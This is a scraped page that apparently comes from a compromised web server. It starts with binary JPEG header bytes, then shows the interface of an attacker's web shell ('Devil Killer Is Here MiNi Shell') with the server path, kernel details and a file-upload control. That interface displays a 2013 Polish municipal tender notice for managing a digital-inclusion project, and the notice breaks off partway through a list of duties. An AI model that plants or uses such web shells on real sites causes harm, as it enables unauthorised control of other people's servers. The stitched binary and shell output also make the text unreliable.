JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130214/23591-N-2013.html

<p class="kh_header"><b>Glinojeck: Zarządzanie projektem pn.: Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Glinojeck</b><br>
<b>Numer ogłoszenia: 23591 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Glinojeck , ul. Płocka 12, 06-450 Glinojeck, woj. mazowieckie, tel. 23 6740017, faks 23 6742818.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glinojeck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie projektem pn.: Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Glinojeck.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zarządzanie projektem pn.: Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Glinojeck .

Przetarg realizowany jest w 5 częściach, w zakresie wykonywania zadań:
1)	część 1  - kierownika projektu - 1 osoba
2)	część 2 - specjalisty ds. obsługi finansowej - 1 os.
3)	część 3 - opiekuna projektu ds. administracyjnych - 1 os.
4)	część 4 - opiekuna projektu ds. administracyjnych - 1 os.
5)	część 5 - opiekuna projektu ds. technicznych - 1 os. 
Każdy Wykonawca może złożyć ofertę maksymalnie na 1 część..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DOTYCZY WSZYSTKICH CZĘŚCI: 
Ocena będzie dokonana na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.22 ust 1 ustawy Pzp, 

ocena spełniania warunków przez wykonawców zostanie dokonana metodą spełnia- nie spełnia na podstawie badania złożonych dokumentów  i oświadczeń</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZ. I:
wykonawca zobowiązany jest wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, uczestniczył przy realizacji projektów współfinansowanych ze środków zewnętrznych, tj. uczestniczenie w realizacji co najmniej 2 projektów współfinansowanych ze środków zewnętrznych, w tym w min. 1 projekcie o wartości co najmniej 2.000.000,00 zł, na stanowisku kierownika projektu lub/i koordynatora projektu lub/i asystenta projektu - z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane zgodnie z umową i  prawidłowo ukończone.

CZ II:
wykonawca zobowiązany jest wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, uczestniczył przy realizacji projektów współfinansowanych ze środków zewnętrznych, tj. uczestniczenie w realizacji co najmniej 2 projektów współfinansowanych ze środków zewnętrznych,- z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane zgodnie z umową i  prawidłowo ukończone.

CZ. III  i  CZ. IV  i  CZ. V:
opis sposobu dokonywania oceny spełniania  tego warunku: 
ocena będzie dokonana na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.22 ust 1 ustawy Pzp.

Ocena spełniania warunków przez wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonych dokumentów  i oświadczeń</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DOTYCZY WSZYSTKICH CZĘŚCI:
ocena będzie dokonana na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.22 ust 1 ustawy Pzp.

Ocena spełniania warunków przez wykonawców zostanie dokonana metodą spełnia -nie spełnia na podstawie badania złożonych dokumentów  i oświadczeń</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DOTYCZY WSZYSTKICH CZĘŚCI:
ocena będzie dokonana na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.22 ust 1 ustawy Pzp.

Ocena spełniania warunków przez wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonych dokumentów  i oświadczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>DOTYCZY WSZYSTKICH CZĘŚCI:
ocena będzie dokonana na podstawie przedłożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.22 ust 1 ustawy Pzp.
 
Ocena spełniania warunków przez wykonawców zostanie dokonana metodą spełnia - nie spełnia na podstawie badania złożonych dokumentów  i oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie:
1)	zmiany terminu realizacji przedmiotu zamówienia, w przypadku:
a)	działania siły wyższej uniemożliwiającej wykonanie usługi w określonym pierwotnie terminie o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, 
b)	wystąpienia  okoliczności niezależnych od Zamawiającego oraz Wykonawcy 
c)	konieczności uzyskania decyzji lub uzgodnień, mogących spowodować wstrzymanie realizacji usługi o czas niezbędny do uzyskania wymaganych decyzji bądź uzgodnień, 
d)	konieczności zmiany harmonogramu realizacji projektu i finansowania uwarunkowanych prawidłową realizacja projektu pn.: Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Glinojeck
e)	gdy w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia) niemożliwy do zauważenia przez Wykonawców  i Zamawiającego na etapie wyboru najkorzystniejszej oferty
f)  przedłużenia/ skrócenia realizacji projektu Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Glinojeck
2)	zmiany przedstawicieli stron, podmiotów biorących udział w zamówieniu np. podwykonawców, osób reprezentujących strony, wykazanych realizatorów (osób) realizujących zadania projektu i innych przedstawicieli/podmiotów - w przypadku niemożności pełnienia przez nich powierzonych funkcji, realizacji zamówienia (np. zdarzenia losowe, zmiana pracy, rezygnacja itp). 
W przypadku zmiany osób realizujących projekt Zamawiający dopuści zmianę pod warunkiem, że nowe podmioty /osoby wykażą spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowe podmioty/osób 
Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach, którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowy podmiot. 
3)	zmiany zakresu rzeczowego wykonana usług (zmniejszenie/ zwiększenie zakresu) w przypadku:
a)	zmiany sposobu realizacji projektu Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców Gminy Glinojeck
b)	 rezygnacji z części usług, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy i/lub prawidłowej realizacji projektu: Przeciwdziałanie wykluczeniu cyfrowemu mieszkańców gminy Glinojeck
c) w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia) niemożliwy do zauważenia przez Wykonawców  i Zamawiającego na etapie wyboru najkorzystniejszej oferty
4)	zmiany wynagrodzenia Wykonawcy określonego w umowie w przypadku:
a)	zmniejszenia zakresu rzeczowego usług 
b)	zmiana stawki urzędowej podatku VAT.
c)	w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia) niemożliwy do zauważenia przez Wykonawców  i Zamawiającego na etapie wyboru najkorzystniejszej oferty
5)	zmiany zapisów umowy wynikające z wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy
6) Zamawiający dopuszcza inne niż powyższe możliwości zmian treści zawartej umowy w następujących okolicznościach:
a)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
b)	konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami pośredniczącymi w ramach Programu Operacyjnego Innowacyjna Gospodarka
c)	Zamawiający zrezygnuje z realizacji wybranej części zamówienia 
d)	Zmiana jest korzystna dla Zamawiającego, a nie była możliwa do przewidzenia w chwili zawarcia umowy
e)	wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób  a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.
f)	pojawienie się sytuacji nie możliwych do przewidzenia w chwili zawarcia wszczęcia postępowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glinojeck.bipgmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Płocka 12
06-450 Glinojeck 
pok. 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2013 godzina 10:00, miejsce: Siedziba Zamawiającego tj.
Gmina Glinojeck
ul. Płocka 12
06-450 Glinojeck
sekretariat - pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 8.3. - Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion w ramach 8. Osi Priorytetowej Programu Operacyjnego Innowacyjna Gospodarka 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji Kierownika Projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań Kierownika Projektu, należeć będzie:
a)	organizacja i nadzór nad funkcjonowaniem biura projektu;
b)	prowadzenie dokumentacji związanej z realizacją projektu;
c)	nadzór nad prawidłowym obiegiem dokumentów projektowych
d)	udział w przygotowywaniu sprawozdań i informacji z realizacji projektów; 
e)	nadzór nad realizacją rzeczowo - finansową projektów;
f)	nadzór nad działaniami informacyjno - promocyjnymi projektu, w tym nad  przygotowywaniem artykułów do prasy i ogłoszeń, materiałów na stronę internetową, nad prawidłowym oznakowaniem sprzętu, pomieszczeń, dokumentacji itp.;
g)	nadzór nad zgodnością realizacji projektu z wytycznymi Programu Operacyjnego Innowacyjna Gospodarka, weryfikacja dokumentów źródłowych;
h)	przeprowadzenie monitoringu i ewaluacji projektu;
i)	opracowanie i aktualizowanie planów i harmonogramów poszczególnych zadań, dotyczących realizacji Projektu;
j)	zebranie, przygotowanie i pomoc w wyborze ofert usług i dostaw zgodnie z Projektem;
k)	przygotowanie projektów umów z wykonawcami;
l)	nadzór nad przygotowaniem i zawarciem umów użyczenia sprzętu teleinformatycznego;
m)	nadzór nad przekazywaniem sprzętu teleinformatycznego i dostawą szerokopasmowego Internetu;
n)	zapewnienie sprawnej komunikacji wewnętrznej - między zespołem projektu i zespołem administracyjno-finansowym; 
o)	odpowiedzialność za kontrole realizacji projektu oraz udział w obsłudze zewnętrznych instytucji kontrolujących wykonanie projektu;
p)	utrzymywanie stałych kontaktów z opiekunem projektu w Instytucji Pośredniczącej, informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, przestrzeganie obowiązków i zaleceń wynikających z umowy o dofinansowanie projektu;
q)	współuczestniczenie w przygotowaniu i przeprowadzaniu procedur związanych 
z udzielaniem zamówień publicznych;
r)	nadzór nad organizacją szkoleń dla Beneficjentów ostatecznych Projektu;
s)	nadzór nad sprzętem projektowym przekazanym do odbiorców Projektu tj. osób fizycznych oraz nadzór nad zapewnieniem dostępu do Internetu wszystkim w/w;
t)	nadzór nad zapewnieniem opieki serwisowej sprzętu i oprogramowania przez okres realizacji Projektu;
u)	pomiar i monitorowanie wskaźników realizacji Projektu, rezultatów wskazanych we wniosku o dofinansowanie Projektu.
Wymagane jest:
-	wykształcanie średnie lub wyższe;
-	doświadczenie przy realizacji projektów współfinansowanych ze środków zewnętrznych, tj. uczestniczenie w realizacji co najmniej 2 projektów współfinansowanych ze środków zewnętrznych, w tym w min. 1 projekcie o wartości co najmniej 2.000.000,00 zł, na stanowisku kierownika projektu, koordynatora projektu, asystenta projektu;
- znajomość tematyki budowy sieci teleinformatycznej, 
- znajomość tematyki związanej z realizacją projektów unijnych, a w  szczególności projektów realizowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji specjalisty ds. obsługi finansowej projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań specjalisty ds. obsługi finansowej projektu, należeć będzie:
 a)  koordynacja finansowo - rozliczeniowa realizacji zadań z zakresu projektów   unijnych;
b)  przygotowywanie raportów w zakresie wydatków;
c)	weryfikacja i opisywanie dokumentów finansowych pod kątem ich kwalifikowalności i zgodności z projektem;
d)	przygotowywanie dokumentacji niezbędnej do rozliczenia projektu;
e)	sporządzanie wniosków o płatność zgodnie z obowiązującymi dokumentami programowymi i aktualnymi wytycznymi Instytucji Pośredniczącej, w tym sporządzenie końcowego wniosku o płatność;
f)	aktualizacja harmonogramu finansowo-rzeczowego projektu;
g)	przygotowywanie sprawozdań;
h)	kontrola prawidłowości postępu finansowego realizacji projektu oraz zgodności wydatków z budżetem projektu;
i)	monitoring realizacji budżetów i reagowanie na potrzebę ewentualnych zmian w budżecie;
j)	współpraca z zespołem projektowym;
k)	niezwłoczne informowanie Kierownika projektu o jakichkolwiek okolicznościach mogących mieć wpływ na zmianę kosztów projektu;
l)	poszukiwanie oraz gromadzenie informacji dotyczących wytycznych do realizacji projektów;
m)	przygotowywanie pism związanych z koordynacją finansowo - rozliczeniową oraz zarządzaniem projektem;
n)	kontakt z Instytucją Pośredniczącą w zakresie rozliczeń finansowych;
o)	archiwizowanie dokumentów księgowych;
p)	odpowiedzialność za kontrole realizacji projektu w zakresie finansowym oraz udział w obsłudze zewnętrznych instytucji kontrolujących wykonanie projektu.
Wymagane jest:
- wykształcenie średnie lub wyższe ekonomiczne i co najmniej 3-letni staż pracy w księgowości;
- uczestniczenie w realizacji co najmniej 2 projektów współfinansowanych ze środków zewnętrznych, w zakresie rozliczania finansowego projektu;
- znajomość obsługi programów księgowych oraz aplikacji generator wniosków płatniczych;
- znajomość obsługi urządzeń biurowych;
- znajomość zasad finansowania PO IG EFRR;
- dobra organizacja pracy;
- dokładność i precyzja w działaniu; 
- umiejętność pracy w zespole..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji opiekuna projektu ds. administracyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do zadań opiekuna projektu ds. administracyjnych, należeć będzie:
a)	realizacja działań administracyjnych w projekcie;
b)	organizacja pracy biura projektu;
c)	prowadzenie dokumentacji administracyjnej, korespondencji w ramach projektów;
d)	współpraca z Kierownikiem Projektu, Specjalistą ds. obsługi finansowej;
e)	bieżący kontakt z uczestnikami projektu;
f)	prowadzenie dokumentacji związanej z realizacją zajęć (dokumenty uczestników projektu, listy obecności, dzienniki zajęć itp.) oraz innych działań w ramach projektu;
g)	nadzór nad zabezpieczeniem bazy lokalowej i technicznej na zajęcia (sale, sprzęt);
h)	nadzór nad prawidłowym przebiegiem zajęć zgodnie z harmonogramem zajęć;
i)	odpowiedzialność za prawidłowość prowadzonej dokumentacji związanej z realizacją wszelkich form wsparcia w projekcie;
j)	współpraca z wykonawcami/ osobami prowadzącymi kursy, zajęcia, doradztwo itp. w zakresie niezbędnym do realizacji procesu dydaktycznego;
k)	współpraca z administratorem strony internetowej projektu;
l)	współpraca z Kierownikiem projektu w zakresie przygotowania treści strony internetowej projektu;
m)	rzetelne i terminowe wykonywanie powierzonych zadań zgodnie z harmonogramem projektu;
n)	natychmiastowe informowanie Kierownika projektu o zaistniałych problemach i trudnościach związanych z realizacją projektu oraz zgłaszanie propozycji rozwiązań 
o)	przygotowanie i archiwizacja dokumentacji projektowej;
